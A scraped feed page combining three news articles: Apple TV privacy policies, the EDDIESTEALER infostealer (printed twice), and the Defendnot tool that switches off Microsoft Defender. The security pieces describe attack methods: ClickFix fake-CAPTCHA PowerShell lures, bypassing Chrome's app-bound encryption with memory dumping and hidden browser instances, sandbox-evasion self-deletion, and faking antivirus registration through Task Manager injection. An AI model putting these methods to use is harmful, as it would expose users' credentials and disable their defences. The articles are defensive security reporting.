information that identifies you or your device, like your email address." Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default. The Apple TV also lets users control which apps can access the set-top box's Bluetooth functionality, photos, music, and HomeKit data (if applicable), and the remote's microphone. "Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data," said RJ Cross, director of the consumer privacy program at the Public Interest Research Group (PIRG). "I personally trust them more with my data than other tech companies." What if you share analytics data? If you allow your Apple TV to share analytics data with Apple or app developers, that data won't be personally identifiable, Apple says. Any collected personal data is "not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy," Apple says. Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data. In support documentation (PDF), Apple details its use of differential privacy: The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don't receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees. What if you use an Apple account with your Apple TV? Another factor to consider is Apple's privacy policy regarding Apple accounts, formerly Apple IDs. Apple support documentation says you "need" an Apple account to use an Apple TV, but you can use the hardware without one. Still, it's common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes. So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as "data about your activity on and use of" Apple offerings, including "app launches within our services...; browsing history; search history; [and] product interaction." Other types of data Apple may collect from Apple accounts include transaction information (Apple says this is "data about purchases of Apple products and services or transactions facilitated by Apple, including purchases on Apple platforms"), account information ("including email address, devices registered, account status, and age"), device information (including serial number and browser type), contact information (including physical address and phone number), and payment information (including bank details). None of that is surprising considering the type of data needed to make an Apple account work. Many Apple TV users can expect Apple to gather more data from their Apple account usage on other devices, such as iPhones or Macs. However, if you use the same Apple account across multiple devices, Apple recognizes that all the data it has collected from, for example, your iPhone activity, also applies to you as an Apple TV user. A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won't be able to use the Apple TV app, one of the device's key features. Data collection via the Apple TV app You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of many (but not all) popular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is. As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app's privacy policy, "information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices." That all makes sense for ensuring that the app remembers things like which episode of Severance you're on across devices. Apple collects other data, though, that isn't necessary for functionality. It says it gathers data on things like the "features you use (for example, Continue Watching or Library)," content pages you view, how you interact with notifications, and approximate location information (that Apple says doesn't identify users) to help improve the app. Additionally, Apple tracks the terms you search for within the app, per its policy: We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model. This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate. Data collected from the Apple TV app used for ads By default, the Apple TV app also tracks "what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app" to make personalized content recommendations. Content recommendations aren't ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you. You can disable the Apple TV app's personalized recommendations, but it's a little harder than you might expect since you can't do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off. The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project (STOP), noted to Ars that even though Apple TV users can opt out of personalized content recommendations, "many will not realize they can." Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can "be used to serve geographically relevant ads," according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes. Apple's tvOS doesn't have integrated ads. For comparison, some TV OSes, like Roku OS and LG's webOS, show ads on the OS's home screen and/or when showing screensavers. But data gathered from the Apple TV app can still help Apple's advertising efforts. This can happen if you allow personalized ads in other Apple apps serving targeted apps, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, "including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you," the Apple TV app privacy policy says. Apple also provides third-party advertisers and strategic partners with "non-personal data" gathered from the Apple TV app: We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks. Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, "and improve their associated products and services," Apple says. Apple's policy notes: For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographics[,] such as age group and gender (which may be inferred from information such as your name and salutation in your Apple Account), to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative work [and] meet royalty and accounting requirements. When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app. All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies "in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements." Warner Bros. Discovery says it discloses information about Max viewers "with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests." And Disney+ users have Nielsen tracking on by default. What if you use Siri? You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit. According to the privacy policy accessible in Apple TV boxes' settings, Apple boxes automatically send all Siri requests to Apple's servers. If you opt into using Siri data to "Improve Siri and Dictation," Apple will store your audio data. If you opt out, audio data won't be stored, but per the policy: In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple. Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn't store the audio but may store transcriptions of the audio. If you opt to "Improve Siri and Dictation," Apple says your history of voice requests isn't tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option. The policy states: Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, you request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products ... Apple may also review a subset of the transcripts of your interactions and this ... may be kept beyond two years for the ongoing improvements of products and services. Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn't always adhered to that commitment. In January, Apple agreed to pay $95 million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio. Outside of Apple, we've seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person's Apple TV usage might be unexpectedly analyzed to fuel Apple's business. Automatic content recognition Apple TVs aren't preloaded with automatic content recognition (ACR), an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point. Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it's technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs. (Enswers was acquired by Gracenote, which Nielsen now owns.) In general, though, there are challenges to adding ACR to hardware that people already own, Li explained: Everyone believes, in theory, you can add ACR anywhere you want at any time because it's software, but because of the way [hardware is] architected... the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations. Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, "including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation." Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route. If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV's biggest draws. However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn't currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom's ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph. Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it's reported to be losing Apple $1 billion per year since its launch. One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users. "The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads," PIRG's Cross said. Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers. "Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike," Apple's advertising guide for buying ads on Apple News and Stocks reads. The most private streaming gadget It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs (which are incredibly hard to find these days). And if Apple follows its own policies, much of the data it gathers should be kept in-house. However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple's streaming hardware and software settings prioritize privacy by default, some advocates believe there's room for improvement. For example, STOP's Maestro said: Unlike in the [European Union], where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple's servers. Users are left with little way to verify those privacy promises. Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. "Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple's public commitment to privacy," Maestro said. There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money. As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren't totally incapable of tracking you. But they're still the best recommendation for streaming users seeking hardware with more privacy and fewer ads. Scharon Harding Senior Technology Reporter Scharon Harding Senior Technology Reporter Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She's been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK. 22 Comments
    0 Комментарии 0 Поделились 0 предпросмотр
  • New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data

    May 30, 2025Ravie LakshmananBrowser Security / Malware

    A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages.
    "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as credentials, browser information, and cryptocurrency wallet details," Elastic Security Labs researcher Jia Yu Chan said in an analysis.
    The attack chains begin with threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus CAPTCHA check pages, which prompt site visitors to "prove you are notrobot" by following a three-step process, a prevalent tactic called ClickFix.
    This involves instructing the potential victim to open the Windows Run dialog prompt, paste an already copied command into the "verification window", and press enter. This effectively causes the obfuscated PowerShell command to be executed, resulting in the retrieval of a next-stage payload from an external server.
    The JavaScript payloadis subsequently saved to the victim's Downloads folder and executed using cscript in a hidden window. The main goal of the intermediate script is to fetch the EDDIESTEALER binary from the same remote server and store it in the Downloads folder with a pseudorandom 12-character file name.
    Written in Rust, EDDIESTEALER is a commodity stealer malware that can gather system metadata, receive tasks from a command-and-controlserver, and siphon data of interest from the infected host. The exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps.
    "These targets are subject to change as they are configurable by the C2 operator," Elastic explained. "EDDIESTEALER then reads the targeted files using standard kernel32.dll functions like CreateFileW, GetFileSizeEx, ReadFile, and CloseHandle."

    The collected host information is encrypted and transmitted to the C2 server in a separate HTTP POST request after the completion of each task.
    Besides incorporating string encryption, the malware employs a custom WinAPI lookup mechanism for resolving API calls and creates a mutex to ensure that only one version is running at any given time. It also incorporates checks to determine if it's being executed in a sandboxed environment, and if so, deletes itself from disk.
    "Based on a similar self-deletion technique observed in Latrodectus, EDDIESTEALER is capable of deleting itself through NTFS Alternate Data Streams renaming, to bypass file locks," Elastic noted.
    Another noteworthy feature built into the stealer is its ability to bypass Chromium's app-bound encryption to gain access to unencrypted sensitive data, such as cookies. This is accomplished by including a Rust implementation of ChromeKatz, an open-source tool that can dump cookies and credentials from the memory of Chromium-based browsers.
    The Rust version of ChromeKatz also incorporates changes to handle scenarios where the targeted Chromium browser is not running. In such cases, it spawns a new browser instance using the command-line arguments "--window-position=-3000,-3000 ; effectively positioning the new window far off-screen and making its invisible to the user.

    In opening the browser, the objective is to enable the malware to read the memory associated with the network service child process of Chrome that's identified by the "-utility-sub-type=network.mojom.NetworkService" flag and ultimately extract the credentials.
    Elastic said it also identified updated versions of the malware with features to harvest running processes, GPU information, number of CPU cores, CPU name, and CPU vendor. In addition, the new variants tweak the C2 communication pattern by preemptively sending the host information to the server before receiving the task configuration.
    That's not all. The encryption key used for client-to-server communication is hard-coded into the binary, as opposed to retrieving it dynamically from the server. Furthermore, the stealer has been found to launch a new Chrome process with the --remote-debugging-port=<port_num> flag to enable DevTools Protocol over a local WebSocket interface so as to interact with the browser in a headless manner, without requiring any user interaction.
    "This adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines," the company said.
    The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques like browser-based redirections, fake UI prompts, and drive-by download techniques.
    The attack chain starts with an obfuscated JavaScript hosted on a website, that when visited from macOS, initiates a series of redirections to a page that guides victims to launch Terminal and run a shell script, which leads to the download of a stealer malware that has been flagged on VirusTotal as the Atomic macOS Stealer.
    However, the same campaign has been configured to initiate a drive-by download scheme when visiting the web page from an Android, iOS, or Windows device, leading to the deployment of another trojan malware.

    The disclosures coincide with the emergence of new stealer malware families like Katz Stealer and AppleProcessHub Stealer targeting Windows and macOS respectively, and are capable of harvesting a wide range of information from infected hosts, according to Nextron and Kandji.
    Katz Stealer, like EDDIESTEALER, is engineered to circumvent Chrome's app-bound encryption, but in a different way by employing DLL injection to obtain the encryption key without administrator privileges and use it to decrypt encrypted cookies and passwords from Chromium-based browsers.

    "Attackers conceal malicious JavaScript in gzip files, which, when opened, trigger the download of a PowerShell script," Nextron said. "This script retrieves a .NET-based loader payload, which injects the stealer into a legitimate process. Once active, it exfiltrates stolen data to the command and control server."
    AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configurations, SSH information, and iCloud Keychain.
    Attack sequences distributing the malware entail the use of a Mach-O binary that downloads a second-stage bash stealer script from the server "appleprocesshubcom" and runs it, the results of which are then exfiltrated back to the C2 server. Details of the malware were first shared by the MalwareHunterTeam on May 15, 2025, and by MacPaw's Moonlock Lab last week.
    "This is an example of a Mach-O written in Objective-C which communicates with a command and control server to execute scripts," Kandji researcher Christopher Lopez said.

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.

    SHARE




    #new #eddiestealer #malware #bypasses #chrome039s
    New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
    May 30, 2025Ravie LakshmananBrowser Security / Malware A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as credentials, browser information, and cryptocurrency wallet details," Elastic Security Labs researcher Jia Yu Chan said in an analysis. The attack chains begin with threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus CAPTCHA check pages, which prompt site visitors to "prove you are notrobot" by following a three-step process, a prevalent tactic called ClickFix. This involves instructing the potential victim to open the Windows Run dialog prompt, paste an already copied command into the "verification window", and press enter. This effectively causes the obfuscated PowerShell command to be executed, resulting in the retrieval of a next-stage payload from an external server. The JavaScript payloadis subsequently saved to the victim's Downloads folder and executed using cscript in a hidden window. The main goal of the intermediate script is to fetch the EDDIESTEALER binary from the same remote server and store it in the Downloads folder with a pseudorandom 12-character file name. Written in Rust, EDDIESTEALER is a commodity stealer malware that can gather system metadata, receive tasks from a command-and-controlserver, and siphon data of interest from the infected host. The exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps. "These targets are subject to change as they are configurable by the C2 operator," Elastic explained. "EDDIESTEALER then reads the targeted files using standard kernel32.dll functions like CreateFileW, GetFileSizeEx, ReadFile, and CloseHandle." The collected host information is encrypted and transmitted to the C2 server in a separate HTTP POST request after the completion of each task. Besides incorporating string encryption, the malware employs a custom WinAPI lookup mechanism for resolving API calls and creates a mutex to ensure that only one version is running at any given time. It also incorporates checks to determine if it's being executed in a sandboxed environment, and if so, deletes itself from disk. "Based on a similar self-deletion technique observed in Latrodectus, EDDIESTEALER is capable of deleting itself through NTFS Alternate Data Streams renaming, to bypass file locks," Elastic noted. Another noteworthy feature built into the stealer is its ability to bypass Chromium's app-bound encryption to gain access to unencrypted sensitive data, such as cookies. This is accomplished by including a Rust implementation of ChromeKatz, an open-source tool that can dump cookies and credentials from the memory of Chromium-based browsers. The Rust version of ChromeKatz also incorporates changes to handle scenarios where the targeted Chromium browser is not running. In such cases, it spawns a new browser instance using the command-line arguments "--window-position=-3000,-3000 ; effectively positioning the new window far off-screen and making its invisible to the user. In opening the browser, the objective is to enable the malware to read the memory associated with the network service child process of Chrome that's identified by the "-utility-sub-type=network.mojom.NetworkService" flag and ultimately extract the credentials. Elastic said it also identified updated versions of the malware with features to harvest running processes, GPU information, number of CPU cores, CPU name, and CPU vendor. In addition, the new variants tweak the C2 communication pattern by preemptively sending the host information to the server before receiving the task configuration. That's not all. The encryption key used for client-to-server communication is hard-coded into the binary, as opposed to retrieving it dynamically from the server. Furthermore, the stealer has been found to launch a new Chrome process with the --remote-debugging-port=<port_num> flag to enable DevTools Protocol over a local WebSocket interface so as to interact with the browser in a headless manner, without requiring any user interaction. "This adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines," the company said. The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques like browser-based redirections, fake UI prompts, and drive-by download techniques. The attack chain starts with an obfuscated JavaScript hosted on a website, that when visited from macOS, initiates a series of redirections to a page that guides victims to launch Terminal and run a shell script, which leads to the download of a stealer malware that has been flagged on VirusTotal as the Atomic macOS Stealer. However, the same campaign has been configured to initiate a drive-by download scheme when visiting the web page from an Android, iOS, or Windows device, leading to the deployment of another trojan malware. The disclosures coincide with the emergence of new stealer malware families like Katz Stealer and AppleProcessHub Stealer targeting Windows and macOS respectively, and are capable of harvesting a wide range of information from infected hosts, according to Nextron and Kandji. Katz Stealer, like EDDIESTEALER, is engineered to circumvent Chrome's app-bound encryption, but in a different way by employing DLL injection to obtain the encryption key without administrator privileges and use it to decrypt encrypted cookies and passwords from Chromium-based browsers. "Attackers conceal malicious JavaScript in gzip files, which, when opened, trigger the download of a PowerShell script," Nextron said. "This script retrieves a .NET-based loader payload, which injects the stealer into a legitimate process. Once active, it exfiltrates stolen data to the command and control server." AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configurations, SSH information, and iCloud Keychain. Attack sequences distributing the malware entail the use of a Mach-O binary that downloads a second-stage bash stealer script from the server "appleprocesshubcom" and runs it, the results of which are then exfiltrated back to the C2 server. Details of the malware were first shared by the MalwareHunterTeam on May 15, 2025, and by MacPaw's Moonlock Lab last week. "This is an example of a Mach-O written in Objective-C which communicates with a command and control server to execute scripts," Kandji researcher Christopher Lopez said. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE     #new #eddiestealer #malware #bypasses #chrome039s
    THEHACKERNEWS.COM
    New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
    May 30, 2025Ravie LakshmananBrowser Security / Malware A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as credentials, browser information, and cryptocurrency wallet details," Elastic Security Labs researcher Jia Yu Chan said in an analysis. The attack chains begin with threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus CAPTCHA check pages, which prompt site visitors to "prove you are not [a] robot" by following a three-step process, a prevalent tactic called ClickFix. This involves instructing the potential victim to open the Windows Run dialog prompt, paste an already copied command into the "verification window" (i.e., the Run dialog), and press enter. This effectively causes the obfuscated PowerShell command to be executed, resulting in the retrieval of a next-stage payload from an external server ("llll[.]fit"). The JavaScript payload ("gverify.js") is subsequently saved to the victim's Downloads folder and executed using cscript in a hidden window. The main goal of the intermediate script is to fetch the EDDIESTEALER binary from the same remote server and store it in the Downloads folder with a pseudorandom 12-character file name. Written in Rust, EDDIESTEALER is a commodity stealer malware that can gather system metadata, receive tasks from a command-and-control (C2) server, and siphon data of interest from the infected host. The exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps. "These targets are subject to change as they are configurable by the C2 operator," Elastic explained. "EDDIESTEALER then reads the targeted files using standard kernel32.dll functions like CreateFileW, GetFileSizeEx, ReadFile, and CloseHandle." The collected host information is encrypted and transmitted to the C2 server in a separate HTTP POST request after the completion of each task. Besides incorporating string encryption, the malware employs a custom WinAPI lookup mechanism for resolving API calls and creates a mutex to ensure that only one version is running at any given time. It also incorporates checks to determine if it's being executed in a sandboxed environment, and if so, deletes itself from disk. "Based on a similar self-deletion technique observed in Latrodectus, EDDIESTEALER is capable of deleting itself through NTFS Alternate Data Streams renaming, to bypass file locks," Elastic noted. Another noteworthy feature built into the stealer is its ability to bypass Chromium's app-bound encryption to gain access to unencrypted sensitive data, such as cookies. This is accomplished by including a Rust implementation of ChromeKatz, an open-source tool that can dump cookies and credentials from the memory of Chromium-based browsers. The Rust version of ChromeKatz also incorporates changes to handle scenarios where the targeted Chromium browser is not running. In such cases, it spawns a new browser instance using the command-line arguments "--window-position=-3000,-3000 https://google.com," effectively positioning the new window far off-screen and making its invisible to the user. In opening the browser, the objective is to enable the malware to read the memory associated with the network service child process of Chrome that's identified by the "-utility-sub-type=network.mojom.NetworkService" flag and ultimately extract the credentials. Elastic said it also identified updated versions of the malware with features to harvest running processes, GPU information, number of CPU cores, CPU name, and CPU vendor. In addition, the new variants tweak the C2 communication pattern by preemptively sending the host information to the server before receiving the task configuration. That's not all. The encryption key used for client-to-server communication is hard-coded into the binary, as opposed to retrieving it dynamically from the server. Furthermore, the stealer has been found to launch a new Chrome process with the --remote-debugging-port=<port_num> flag to enable DevTools Protocol over a local WebSocket interface so as to interact with the browser in a headless manner, without requiring any user interaction. "This adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines," the company said. The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques like browser-based redirections, fake UI prompts, and drive-by download techniques. The attack chain starts with an obfuscated JavaScript hosted on a website, that when visited from macOS, initiates a series of redirections to a page that guides victims to launch Terminal and run a shell script, which leads to the download of a stealer malware that has been flagged on VirusTotal as the Atomic macOS Stealer (AMOS). However, the same campaign has been configured to initiate a drive-by download scheme when visiting the web page from an Android, iOS, or Windows device, leading to the deployment of another trojan malware. The disclosures coincide with the emergence of new stealer malware families like Katz Stealer and AppleProcessHub Stealer targeting Windows and macOS respectively, and are capable of harvesting a wide range of information from infected hosts, according to Nextron and Kandji. Katz Stealer, like EDDIESTEALER, is engineered to circumvent Chrome's app-bound encryption, but in a different way by employing DLL injection to obtain the encryption key without administrator privileges and use it to decrypt encrypted cookies and passwords from Chromium-based browsers. "Attackers conceal malicious JavaScript in gzip files, which, when opened, trigger the download of a PowerShell script," Nextron said. "This script retrieves a .NET-based loader payload, which injects the stealer into a legitimate process. Once active, it exfiltrates stolen data to the command and control server." AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configurations, SSH information, and iCloud Keychain. Attack sequences distributing the malware entail the use of a Mach-O binary that downloads a second-stage bash stealer script from the server "appleprocesshub[.]com" and runs it, the results of which are then exfiltrated back to the C2 server. Details of the malware were first shared by the MalwareHunterTeam on May 15, 2025, and by MacPaw's Moonlock Lab last week. "This is an example of a Mach-O written in Objective-C which communicates with a command and control server to execute scripts," Kandji researcher Christopher Lopez said. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    
    12 Комментарии 0 Поделились 0 предпросмотр
  • Windows PCs at risk as new tool disarms built-in security

    Published
    May 29, 2025 10:00am EDT close Windows Defender Security Center scam: How to protect your computer from fake pop-ups Tech expert Kurt "CyberGuy" Knutsson says a tech support scam used a fake Windows Defender pop-up, tricking the victim to call and download software. All modern Windows PCs come with Microsoft Defender built in. For the unaware, this tool is Windows’ native antivirus. Over time, it has matured into a reliable security tool capable of blocking a wide range of threats. However, a tool called Defendnot can shut down Microsoft Defender completely, without exploiting a bug or using malware. It simply convinces Windows that another antivirus is already running.The implications are serious. This tool does not break into the system or use advanced code injection. It uses Windows features the way they were designed to be used. And that makes the problem harder to detect and harder to fix. Windows software on a PCThe tool works by pretending to be an antivirusWindows is built to avoid running multiple antivirus products at once. When a third-party antivirus registers itself, Windows disables Microsoft Defender to prevent conflicts. Defendnot exploits this system using an undocumented API that security software uses to communicate with the Windows Security Center.The tool registers a fake antivirus that appears legitimate to the system. It uses a dummy DLL and injects it into Task Manager, a trusted Windows process. By operating inside this signed process, Defendnot avoids signature checks and permission blocks. Once the fake antivirus is registered, Windows disables Microsoft Defender without warning or confirmation.WINDOWS 10 SECURITY FLAWS LEAVE MILLIONS VULNERABLENo security alert is shown to the user. No visible changes are made to indicate that the system is unprotected. Unless someone checks manually, the machine remains open to attacks with no real-time protection running.The tool also includes options to set a custom antivirus name, enable logging and configure automatic startup. It achieves persistence by creating a scheduled task that runs whenever the user logs in. Windows software on a laptopFrom GitHub takedown to a fresh buildDefendnot is based on an earlier project called No-Defender. That project used code from an actual antivirus product to fake registration. It gained attention quickly and was removed after a copyright complaint from the vendor whose code had been reused. The developer took the project down and walked away from it.With Defendnot, the creator rebuilt the core features using original code. This version avoids copyright issues and uses a new method to achieve the same effect. It does not rely on another antivirus or third-party binaries. It was written from scratch to demonstrate how simple it is to manipulate Windows security from inside the system.Microsoft Defender currently flags the tool as a threat. It detects and quarantines it under the name Win32/Sabsik.FL.!ml. However, the fact that it works at all points to a weakness in how Windows handles antivirus registration and trust.WHAT IS ARTIFICIAL INTELLIGENCE? Windows laptop showing the home screen6 ways to protect yourself from malicious programsWhile Defendnot is a research project, there’s a chance that similar tools are already out there and could be used to compromise your PC. Here are a few tips to help you stay safe:1. Use strong antivirus software: Even with regular updates, Windows systems can be left exposed by tools like Defendnot that silently disable built-in defenses. A strong third-party antivirus with real-time protection and frequent updates provides essential backup security. Look for solutions with real-time protection and frequent updates to tackle emerging threats. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices.2. Limit exposure: Many exploits rely on user interaction, such as clicking a shady link, downloading a compromised file or mounting an untrusted virtual disk. Stick to reputable websites, avoid opening unsolicited email attachments and use a browser with built-in security features.3. Avoid running unexpected commands: Never paste or run commandsyou don’t understand or that were copied from random websites. Attackers often trick users into unknowingly running malware this way.4. Keep your software updated: Regularly update your operating system, browsers and all software applications. Updates often include patches for security vulnerabilities that malware can exploit.5. Use two-factor authentication: Enable 2FA on all your accounts. This adds an extra layer of security by requiring a second form of verification, making it harder for attackers to gain access even if they have your password.6. Invest in personal data removal services: Even with strong device security, your personal information may still be exposed online through data brokers and people-finder sites. These services collect and publish details like your name, address and phone number, making you an easier target for identity theft or phishing. Automated data removal services track down these sites and submit removal requests on your behalf, helping to reduce your digital footprint and increase your online anonymity. While they can't erase every trace of your information, they make it significantly harder for attackers to find and exploit your personal data, which saves you time and reduces unwanted spam in the process.While no service promises to remove all your data from the internet, having a removal service is great if you want to constantly monitor and automate the process of removing your information from hundreds of sites continuously over a longer period of time. Check out my top picks for data removal services here.Get a free scan to find out if your personal information is already out on the web.Kurt’s key takeawayDefendnot points to a bigger issue with how Windows handles security. It takes a feature meant to prevent software conflicts and turns it into a way to completely disable protection. The system assumes any registered antivirus is legitimate, so if attackers can fake that, they get in without much resistance.We often think of security as blocking the bad and trusting the good. But this case shows what happens when that trust is misplaced. Defendnot doesn’t sneak past Windows defenses. It walks right in using valid credentials. The solution isn’t just more patches or stronger malware signatures. What we need is a smarter way for systems to tell what is actually safe.CLICK HERE TO GET THE FOX NEWS APPDo you think companies like Microsoft need to rethink how Windows handles antivirus registration and trust, given that tools like Defendnot can so easily disable built-in protections without using malware or exploiting a bug? Let us know by writing us at 